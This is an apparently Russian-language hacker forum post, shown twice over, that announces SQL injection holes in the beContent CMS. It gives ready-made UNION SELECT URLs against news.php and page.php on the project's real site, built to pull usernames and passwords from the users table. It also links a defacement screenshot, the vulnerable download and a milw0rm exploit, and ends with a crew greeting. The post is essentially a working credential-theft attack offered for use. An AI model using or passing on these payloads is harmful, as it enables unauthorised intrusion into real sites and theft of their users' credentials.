b3
25.06.2008, 15:08
www.becontent.org
уязвимость(бонально):
http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
на данный момент там стоит последняя версия а месяца 2 назад офф сайт был под дефейсом, вот даже скринил:
http://sqlinj.com/owned/becontent.gif
скачать данную версию:
http://becontent.googlecode.com/files/beContent%20v031.zip
мдя...последняя версия так само уязвима:
http://www.becontent.org/page.php?id=-5+union+select+1,2,concat_ws(0x3a,username,passwor d)+from+users/*
Ктото прикорманить бажку решил)) :
http://www.milw0rm.com/exploits/5170
Greatz : Barakuda (GraBBerZ team)
уязвимость(бонально):
http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
на данный момент там стоит последняя версия а месяца 2 назад офф сайт был под дефейсом, вот даже скринил:
http://sqlinj.com/owned/becontent.gif
скачать данную версию:
http://becontent.googlecode.com/files/beContent%20v031.zip
мдя...последняя версия так само уязвима:
http://www.becontent.org/page.php?id=-5+union+select+1,2,concat_ws(0x3a,username,passwor d)+from+users/*
Ктото прикорманить бажку решил)) :
http://www.milw0rm.com/exploits/5170
Greatz : Barakuda (GraBBerZ team)